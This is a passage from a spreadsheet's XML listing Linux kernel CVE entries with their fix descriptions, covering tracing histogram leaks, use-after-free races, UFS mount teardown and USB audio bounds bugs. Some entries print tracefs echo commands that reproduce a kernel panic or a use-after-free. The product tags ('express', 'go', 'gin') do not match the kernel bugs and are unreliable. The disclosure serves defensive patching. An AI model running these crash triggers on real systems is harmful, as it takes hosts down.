	} else {
		if (hist_field-&gt;flags &amp; (...))
			goto err;
	}
	hist_data-&gt;fields[val_idx] = hist_field;
Both checks jump past that store, and the err label returns without
freeing anything. The error unwinds to create_hist_data(), which calls
destroy_hist_data() -&gt; destroy_hist_fields(), and that reaches a field
only by walking fields[]. A field that never got there is unreachable.
commit e0213434fe3e ("tracing: Do not let histogram values have some
modifiers") set ret to -EINVAL and fell through to the store, which left
the field owned by fields[] and freed along with the rest of hist_data.
Splitting the check into a value case and a variable case replaced that
fall-through with a goto that skips it.
With CONFIG_DEBUG_KMEMLEAK, 200 writes of
  # echo 'hist:keys=prev_pid:vals=next_pid.log2' &gt; \
	 events/sched/sched_switch/trigger
each correctly rejected with -EINVAL, leave 332 unreferenced objects
(63744 bytes) reported at create_hist_field(); 200 install and remove
cycles of a valid trigger leave none. A '.log2' field is two
allocations, since create_hist_field() puts the plain field in
operands[0] of the log2 field, and both are reported.
Use destroy_hist_field() rather than __destroy_hist_field() so that
operands[0] is freed as well. It returns early for HIST_FIELD_FL_VAR_REF,
which is what an operand owned by hist_data-&gt;var_refs[] needs; the
rejected field itself is never a var ref, because a var ref never carries
a modifier flag.</t>
        </is>
      </c>
      <c r="T569" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97921</t>
        </is>
      </c>
    </row>
    <row r="570">
      <c r="A570" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B570" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C570" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97922</t>
        </is>
      </c>
      <c r="D570" s="5" t="inlineStr"/>
      <c r="E570" s="5" t="inlineStr"/>
      <c r="F570" s="5" t="inlineStr"/>
      <c r="G570" s="5" t="inlineStr"/>
      <c r="H570" s="5" t="inlineStr"/>
      <c r="I570" s="5" t="inlineStr"/>
      <c r="J570" s="5" t="inlineStr">
        <is>
          <t>express</t>
        </is>
      </c>
      <c r="K570" s="5" t="inlineStr"/>
      <c r="L570" s="5" t="inlineStr"/>
      <c r="M570" s="5" t="inlineStr"/>
      <c r="N570" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O570" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P570" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q570" s="5" t="inlineStr"/>
      <c r="R570" s="5" t="inlineStr"/>
      <c r="S570" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tracing: Free histogram var refs regardless of how often they are referenced
Using the same variable three or more times in one hist trigger leaks the
variable reference and its strings when the trigger is removed.
commit 656fe2ba85e8 ("tracing: Use hist trigger's var_ref array to destroy
var_refs") made a trigger's var_refs[] array the only owner of a var ref:
destroy_hist_field() returns early for HIST_FIELD_FL_VAR_REF, so the field
expressions never destroy one. One entry, freed once, no count needed.
commit 8bcebc77e85f ("tracing: Fix histogram code when expression has same
var as value") then made repeated references share one object and added a
count of them. Only the increment side exists, since those expressions
still return early and never drop a reference, so __destroy_hist_field()
sees how many references were created rather than how many are left. It
frees when the decremented count is 0 or 1, so two references work and
three or more leak.
Sharing kept one array entry per object, and create_var_ref() searches and
appends within a single trigger, so nothing outside it holds the object.
Removing a trigger whose variables are still referenced is already refused
by check_var_refs() with -EBUSY. Drop the count and free unconditionally.</t>
        </is>
      </c>
      <c r="T570" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97922</t>
        </is>
      </c>
    </row>
    <row r="571">
      <c r="A571" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B571" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C571" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97923</t>
        </is>
      </c>
      <c r="D571" s="5" t="inlineStr"/>
      <c r="E571" s="5" t="inlineStr"/>
      <c r="F571" s="5" t="inlineStr"/>
      <c r="G571" s="5" t="inlineStr"/>
      <c r="H571" s="5" t="inlineStr"/>
      <c r="I571" s="5" t="inlineStr"/>
      <c r="J571" s="5" t="inlineStr"/>
      <c r="K571" s="5" t="inlineStr"/>
      <c r="L571" s="5" t="inlineStr"/>
      <c r="M571" s="5" t="inlineStr"/>
      <c r="N571" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O571" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P571" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q571" s="5" t="inlineStr"/>
      <c r="R571" s="5" t="inlineStr"/>
      <c r="S571" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tracing: Free histogram the var ref when its initialization fails
create_var_ref() allocates a VAR_REF hist_field and then calls
init_var_ref() to fill it in. When that fails the field is leaked.
commit 656fe2ba85e8 ("tracing: Use hist trigger's var_ref array to destroy
var_refs") made destroy_hist_field() return early for
HIST_FIELD_FL_VAR_REF, since var refs are freed by walking the trigger's
var_refs[] array instead. create_var_ref() adds the field to that array
only after init_var_ref() has succeeded, so on this path the field is in
neither place and nothing frees it. The call was correct when it was
written, before var refs were taken out of destroy_hist_field().
init_var_ref() cannot free it either. The caller owns the field, so
init_var_ref() undoes only its own string allocations and leaves the
field alone. Freeing it there would leave create_var_ref() passing freed
memory to destroy_hist_field(), which reads its flags.
Call __destroy_hist_field(), which frees the field without consulting
the flag.</t>
        </is>
      </c>
      <c r="T571" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97923</t>
        </is>
      </c>
    </row>
    <row r="572">
      <c r="A572" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B572" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C572" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97924</t>
        </is>
      </c>
      <c r="D572" s="5" t="inlineStr"/>
      <c r="E572" s="5" t="inlineStr"/>
      <c r="F572" s="5" t="inlineStr"/>
      <c r="G572" s="5" t="inlineStr"/>
      <c r="H572" s="5" t="inlineStr"/>
      <c r="I572" s="5" t="inlineStr"/>
      <c r="J572" s="5" t="inlineStr"/>
      <c r="K572" s="5" t="inlineStr"/>
      <c r="L572" s="5" t="inlineStr"/>
      <c r="M572" s="5" t="inlineStr"/>
      <c r="N572" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O572" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P572" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q572" s="5" t="inlineStr"/>
      <c r="R572" s="5" t="inlineStr"/>
      <c r="S572" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tracing/user_events: Don't destroy fields when event removal fails
destroy_user_event() destroys the event's fields before attempting to
remove the trace event call. If user_event_set_call_visible() fails,
e.g. because the event is still enabled and trace_remove_event_call()
returns -EBUSY, the event is left registered with an irreversibly
destroyed field list. Any subsequent interaction with the event then
operates on an empty field list while it is still fully visible in
tracefs.
Move the field destruction after the call removal, and splice the
field list back onto the event when the removal fails so the event
remains in a consistent state.</t>
        </is>
      </c>
      <c r="T572" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97924</t>
        </is>
      </c>
    </row>
    <row r="573">
      <c r="A573" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B573" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C573" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97925</t>
        </is>
      </c>
      <c r="D573" s="5" t="inlineStr"/>
      <c r="E573" s="5" t="inlineStr"/>
      <c r="F573" s="5" t="inlineStr"/>
      <c r="G573" s="5" t="inlineStr"/>
      <c r="H573" s="5" t="inlineStr"/>
      <c r="I573" s="5" t="inlineStr"/>
      <c r="J573" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K573" s="5" t="inlineStr"/>
      <c r="L573" s="5" t="inlineStr"/>
      <c r="M573" s="5" t="inlineStr"/>
      <c r="N573" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O573" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P573" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q573" s="5" t="inlineStr"/>
      <c r="R573" s="5" t="inlineStr"/>
      <c r="S573" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tick/broadcast: Plug clockevents replacement race
朱恺乾 reported and decoded the following race condition when a broadcast
device is replaced:
CPUA					CPUB
 __tick_broadcast_oneshot_control()
   bc = tick_broadcast_device.evtdev;
					tick_install_broadcast_device(dev)
        				clockevents_exchange_device(cur, dev)
					   shutdown(cur);
					   detach(cur);
					   cur-&gt;handler = noop;
					   tick_broadcast_device.evtdev = dev;
  tick_broadcast_set_event(bc, next_event); &lt;- FAIL: arms a detached device.
If the original broadcast device has a restricted interrupt affinity mask
and the last CPU in that mask goes offline then the BUG() in
tick_cleanup_dead_cpu() triggers because the clockevent device is not in
detached state.
The reason for this is that tick_install_broadcast_device() is not
serialized vs. tick broadcast operations.
The obvious cure is to serialize tick_install_broadcast_device() with
tick_broadcast_lock against a concurrent tick broadcast operation.
That requires to split clockevents_exchange_device() into two parts, one
which does the exchange, shutdown and detach operation and the other which
drops the module reference count. This is required because the module
reference cannot be dropped while holding tick_broadcast_lock.
Let clockevents_exchange_device() do both operations as before, but let the
broadcast device code take the two step approach and do the device
exchange under tick_broadcast_lock and drop the module reference count
after releasing it.</t>
        </is>
      </c>
      <c r="T573" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97925</t>
        </is>
      </c>
    </row>
    <row r="574">
      <c r="A574" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B574" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C574" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97927</t>
        </is>
      </c>
      <c r="D574" s="5" t="inlineStr"/>
      <c r="E574" s="5" t="inlineStr"/>
      <c r="F574" s="5" t="inlineStr"/>
      <c r="G574" s="5" t="inlineStr"/>
      <c r="H574" s="5" t="inlineStr"/>
      <c r="I574" s="5" t="inlineStr"/>
      <c r="J574" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K574" s="5" t="inlineStr"/>
      <c r="L574" s="5" t="inlineStr"/>
      <c r="M574" s="5" t="inlineStr"/>
      <c r="N574" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O574" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P574" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q574" s="5" t="inlineStr"/>
      <c r="R574" s="5" t="inlineStr"/>
      <c r="S574" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ufs: create the root dentry after loading cylinder metadata
ufs_fill_super() installed sb-&gt;s_root before it loaded the cylinder
group structures for a writable mount:
	sb-&gt;s_root = d_make_root(inode);
	...
	if (!sb_rdonly(sb))
		if (!ufs_read_cylinder_structures(sb))
			goto failed;
When ufs_read_cylinder_structures() failed, the error path freed the
in-core superblock information and set sb-&gt;s_fs_info to NULL while
sb-&gt;s_root stayed installed. get_tree_bdev() then reached
deactivate_locked_super(), and because s_root was present,
generic_shutdown_super() called sync_filesystem() and the put_super
operation. Both dereference UFS_SB(sb), which is now NULL, so a mount
that fails only while reading the cylinder groups oopses during
teardown. A crafted image whose first cylinder group cannot be read
reaches this path.
Load the cylinder group metadata first and create the root dentry last,
so the superblock is published to the VFS only once it is fully set up.
ufs_setup_cstotal() and ufs_read_cylinder_structures() take only the
super_block and do not use the root inode, so the reordering is safe.</t>
        </is>
      </c>
      <c r="T574" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97927</t>
        </is>
      </c>
    </row>
    <row r="575">
      <c r="A575" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B575" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C575" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97928</t>
        </is>
      </c>
      <c r="D575" s="5" t="inlineStr"/>
      <c r="E575" s="5" t="inlineStr"/>
      <c r="F575" s="5" t="inlineStr"/>
      <c r="G575" s="5" t="inlineStr"/>
      <c r="H575" s="5" t="inlineStr"/>
      <c r="I575" s="5" t="inlineStr"/>
      <c r="J575" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K575" s="5" t="inlineStr"/>
      <c r="L575" s="5" t="inlineStr"/>
      <c r="M575" s="5" t="inlineStr"/>
      <c r="N575" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O575" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P575" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q575" s="5" t="inlineStr"/>
      <c r="R575" s="5" t="inlineStr"/>
      <c r="S575" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amdgpu: skip the VMID 0 flush for VRAM
Clear-on-release only runs on VRAM, which amdgpu_ttm_map_buffer() reaches
via its direct MC address without programming a GART window, yet the wipe
still forces a VMID 0 flush. On GFX11 (e.g. Navi33) that spurious SDMA
flush can wedge the engine; only flush when a GART window is actually used.
v2: Let amdgpu_ttm_map_buffer() return whether the VMID 0 flush is needed,
    and drive the clear and copy paths from that. (Christian)
v3: Make the vm_needs_flush output parameter mandatory instead of
    allowing NULL. (Christian)
(cherry picked from commit a306e406e570b74318ff7d80e5b07b540ca1d3a9)</t>
        </is>
      </c>
      <c r="T575" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97928</t>
        </is>
      </c>
    </row>
    <row r="576">
      <c r="A576" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B576" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C576" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97929</t>
        </is>
      </c>
      <c r="D576" s="5" t="inlineStr"/>
      <c r="E576" s="5" t="inlineStr"/>
      <c r="F576" s="5" t="inlineStr"/>
      <c r="G576" s="5" t="inlineStr"/>
      <c r="H576" s="5" t="inlineStr"/>
      <c r="I576" s="5" t="inlineStr"/>
      <c r="J576" s="5" t="inlineStr"/>
      <c r="K576" s="5" t="inlineStr"/>
      <c r="L576" s="5" t="inlineStr"/>
      <c r="M576" s="5" t="inlineStr"/>
      <c r="N576" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O576" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P576" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q576" s="5" t="inlineStr"/>
      <c r="R576" s="5" t="inlineStr"/>
      <c r="S576" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ALSA: usbusx2y: validate URB actual_length in interrupt callback
i_usx2y_in04_int() processes the interrupt URB data without checking
urb-&gt;actual_length.  A short transfer from a malfunctioning device
would cause the handler to process uninitialized heap data from the
kmalloc-allocated in04_buf, which is then copied to the mmap-accessible
ctl_snapshot[] array.
Fix by using kzalloc() for in04_buf to zero-initialize the buffer,
and adding an actual_length check to skip processing on short
transfers while still resubmitting the URB.</t>
        </is>
      </c>
      <c r="T576" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97929</t>
        </is>
      </c>
    </row>
    <row r="577">
      <c r="A577" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B577" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C577" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97930</t>
        </is>
      </c>
      <c r="D577" s="5" t="inlineStr"/>
      <c r="E577" s="5" t="inlineStr"/>
      <c r="F577" s="5" t="inlineStr"/>
      <c r="G577" s="5" t="inlineStr"/>
      <c r="H577" s="5" t="inlineStr"/>
      <c r="I577" s="5" t="inlineStr"/>
      <c r="J577" s="5" t="inlineStr"/>
      <c r="K577" s="5" t="inlineStr"/>
      <c r="L577" s="5" t="inlineStr"/>
      <c r="M577" s="5" t="inlineStr"/>
      <c r="N577" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O577" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P577" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q577" s="5" t="inlineStr"/>
      <c r="R577" s="5" t="inlineStr"/>
      <c r="S577" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ALSA: usbusx2y: fix in04_last array size mismatch with in04_buf
The in04_last array in struct usx2ydev is declared as char[24], but
in04_buf is allocated as sizeof(struct us428_ctls) which is 21 bytes.
In i_usx2y_in04_int(), when ctl_snapshot_last == -2 (initialization
path):
    memcpy(usx2y-&gt;in04_last, usx2y-&gt;in04_buf, sizeof(usx2y-&gt;in04_last));
This copies 24 bytes from a 21-byte slab allocation, reading 3 bytes
past the end of the source object.
Introduce a USX2Y_IN04_SIZE constant defined as sizeof(struct
us428_ctls) and use it consistently for the in04_last array, the
in04_buf allocation, the URB transfer length, and the comparison loop,
replacing the bare 24 and 21 literals throughout.</t>
        </is>
      </c>
      <c r="T577" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97930</t>
        </is>
      </c>
    </row>
    <row r="578">
      <c r="A578" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B578" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C578" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97932</t>
        </is>
      </c>
      <c r="D578" s="5" t="inlineStr"/>
      <c r="E578" s="5" t="inlineStr"/>
      <c r="F578" s="5" t="inlineStr"/>
      <c r="G578" s="5" t="inlineStr"/>
      <c r="H578" s="5" t="inlineStr"/>
      <c r="I578" s="5" t="inlineStr"/>
      <c r="J578" s="5" t="inlineStr"/>
      <c r="K578" s="5" t="inlineStr"/>
      <c r="L578" s="5" t="inlineStr"/>
      <c r="M578" s="5" t="inlineStr"/>
      <c r="N578" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O578" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P578" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q578" s="5" t="inlineStr"/>
      <c r="R578" s="5" t="inlineStr"/>
      <c r="S578" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tracing: Don't dereference trace_event_file in deferred trigger free
The enable_event trigger defers trace_event_put_ref() to the
trigger free kthread, but the trace_event_file can already be freed
when the instance is removed.
Keep the trace_event_call directly in enable_trigger_data so the
deferred free does not access the freed trace_event_file.</t>
        </is>
      </c>
      <c r="T578" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97932</t>
        </is>
      </c>
    </row>
    <row r="579">
      <c r="A579" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B579" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C579" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97933</t>
        </is>
      </c>
      <c r="D579" s="5" t="inlineStr"/>
      <c r="E579" s="5" t="inlineStr"/>
      <c r="F579" s="5" t="inlineStr"/>
      <c r="G579" s="5" t="inlineStr"/>
      <c r="H579" s="5" t="inlineStr"/>
      <c r="I579" s="5" t="inlineStr"/>
      <c r="J579" s="5" t="inlineStr"/>
      <c r="K579" s="5" t="inlineStr"/>
      <c r="L579" s="5" t="inlineStr"/>
      <c r="M579" s="5" t="inlineStr"/>
      <c r="N579" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O579" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P579" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q579" s="5" t="inlineStr"/>
      <c r="R579" s="5" t="inlineStr"/>
      <c r="S579" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tracing: Take trace_array reference when opening a tracer options file
When a tracer option file is opened, it is passed a descriptor that points
to an element on the trace_array's topts array. This element has
information to find the trace array and other information. It uses this
element to take a reference of the trace_array so that the trace_array
does not get removed while this file is opened.
Unfortunately, there's a race condition where the element itself could be
freed by the removal of the instance the trace_array represents causing a
use-after-free as this element that is used to find the trace_array to
increment its reference counter is also freed when the instance is
removed.
To solve this, add a trace_array_tracer_options_get() helper function that
will take the address of the element that is passed to the open function
by the inode-&gt;i_private pointer and search all the trace_arrays under a
lock to find the one that the element's address is in the range of the
trace_arrays topts array elements. When a match happens, that trace_array's
reference would be increased.
Note, there's a race where if an admin was deleting and creating trace
instances at the same time and the memory of the old trace_array's array
matched the memory of the new trace_array that it could in theory open the
option from the wrong trace array. But we do not care because it would be
stupid to perform that kind of action. As long as the only thing that can
happen is that the option from the wrong trace array is used and doesn't
crash the kernel it will only make the user confused. But if they are
doing something stupid like this, they are already confused, so no harm
done.</t>
        </is>
      </c>
      <c r="T579" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97933</t>
        </is>
      </c>
    </row>
    <row r="580">
      <c r="A580" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B580" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C580" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97934</t>
        </is>
      </c>
      <c r="D580" s="5" t="inlineStr"/>
      <c r="E580" s="5" t="inlineStr"/>
      <c r="F580" s="5" t="inlineStr"/>
      <c r="G580" s="5" t="inlineStr"/>
      <c r="H580" s="5" t="inlineStr"/>
      <c r="I580" s="5" t="inlineStr"/>
      <c r="J580" s="5" t="inlineStr"/>
      <c r="K580" s="5" t="inlineStr"/>
      <c r="L580" s="5" t="inlineStr"/>
      <c r="M580" s="5" t="inlineStr"/>
      <c r="N580" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O580" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P580" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q580" s="5" t="inlineStr"/>
      <c r="R580" s="5" t="inlineStr"/>
      <c r="S580" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tracing: Fix memory corruption from a "STACKTRACE" histogram key
"cpu", "CPU", "stacktrace" and "STACKTRACE" are generic fields, defined
with an offset and a size of zero so that the filter code can match them
by name. parse_field() maps them onto their common_* equivalents for
backward compatibility, but unlike the common_* names it hands the
placeholder back to the caller instead of NULL.
create_hist_field() takes a non-NULL field as a promise that the record
carries a stacktrace and picks HIST_FIELD_FN_STACK, so the __data_loc
word is read from offset 0, that is from common_type, and its low 16
bits are followed as an offset into the record. What is found there
becomes the length of an unbounded memcpy. Pick an event whose id is
small enough that the offset stays inside its own record and the length
is a kernel text address:
  # cd /sys/kernel/tracing
  # echo 'hist:keys=STACKTRACE' &gt; events/ftrace/print/trigger
  # echo hello &gt; trace_marker
  Oops: general protection fault, probably for non-canonical address
  RIP: 0010:rb_next+0x23/0x60
   &lt;/IRQ&gt;
  RIP: 0010:memcpy+0xc/0x30
   event_hist_trigger+0x2e7/0x12c0
  Kernel panic - not syncing: Fatal exception in interrupt
Leave the field NULL, which is what the comment above the branch says
the code does and what common_stacktrace already does. FILTER_CPU and
FILTER_COMM are left alone, their create_hist_field() branches never
look at the field.</t>
        </is>
      </c>
      <c r="T580" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97934</t>
        </is>
      </c>
    </row>
    <row r="581">
      <c r="A581" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B581" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C581" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97935</t>
        </is>
      </c>
      <c r="D581" s="5" t="inlineStr"/>
      <c r="E581" s="5" t="inlineStr"/>
      <c r="F581" s="5" t="inlineStr"/>
      <c r="G581" s="5" t="inlineStr"/>
      <c r="H581" s="5" t="inlineStr"/>
      <c r="I581" s="5" t="inlineStr"/>
      <c r="J581" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K581" s="5" t="inlineStr"/>
      <c r="L581" s="5" t="inlineStr"/>
      <c r="M581" s="5" t="inlineStr"/>
      <c r="N581" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O581" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P581" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q581" s="5" t="inlineStr"/>
      <c r="R581" s="5" t="inlineStr"/>
      <c r="S581" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tracing: Set the trace clock before registering the histogram trigger
hist_register_trigger() puts the trigger on the global named_triggers
list in cmd_ops-&gt;init(), and only then sets the trace clock:
	if (data-&gt;cmd_ops-&gt;init) {
		ret = data-&gt;cmd_ops-&gt;init(data);
		if (ret &lt; 0)
			goto out;
	}
	if (hist_data-&gt;enable_timestamps) {
		ret = tracing_set_clock(file-&gt;tr, hist_data-&gt;attrs-&gt;clock);
		if (ret) {
			hist_err(tr, HIST_ERR_SET_CLOCK_FAIL, errpos(clock));
			goto out;
		}
The clock string is not checked anywhere before that call, so a named
trigger using common_timestamp with an unknown clock fails after it has
already become findable. event_hist_trigger_parse() then frees it
without taking it off the list, and the next lookup by name reads the
freed object:
 ~# cd /sys/kernel/tracing/events/sched/sched_switch
 ~# echo 'hist:name=foo:keys=common_pid:ts=common_timestamp:clock=bogus' &gt; trigger
 bash: echo: write error: Invalid argument
 ~# echo 'hist:name=foo:keys=common_pid' &gt; trigger
  BUG: KASAN: slab-use-after-free in find_named_trigger+0xac/0xc0
  Read of size 8 at addr ffff88800915d760 by task init/1
   find_named_trigger+0xac/0xc0
   hist_register_trigger+0xc1/0x900
   event_hist_trigger_parse+0x3146/0x6af0
   event_trigger_write+0xce/0x160
  Freed by task 63:
   kfree+0x154/0x420
   trigger_kthread_fn+0xfd/0x160
Set the clock before the trigger is registered, so that nothing which
can fail runs after it is published, the way commit 6f86bdeab633
("tracing: Fix bad hist from corrupting named_triggers list") moved the
registration below the rest of the setup.
tracing_set_filter_buffering() is reference counted, so the init failure
path has to drop the reference that the clock block now takes first.</t>
        </is>
      </c>
      <c r="T581" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97935</t>
        </is>
      </c>
    </row>
    <row r="582">
      <c r="A582" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B582" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C582" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97936</t>
        </is>
      </c>
      <c r="D582" s="5" t="inlineStr"/>
      <c r="E582" s="5" t="inlineStr"/>
      <c r="F582" s="5" t="inlineStr"/>
      <c r="G582" s="5" t="inlineStr"/>
      <c r="H582" s="5" t="inlineStr"/>
      <c r="I582" s="5" t="inlineStr"/>
      <c r="J582" s="5" t="inlineStr"/>
      <c r="K582" s="5" t="inlineStr"/>
      <c r="L582" s="5" t="inlineStr"/>
      <c r="M582" s="5" t="inlineStr"/>
      <c r="N582" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O582" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P582" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q582" s="5" t="inlineStr"/>
      <c r="R582" s="5" t="inlineStr"/>
      <c r="S582" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tracing: Fix memory corruption from the histogram stacktrace modifier
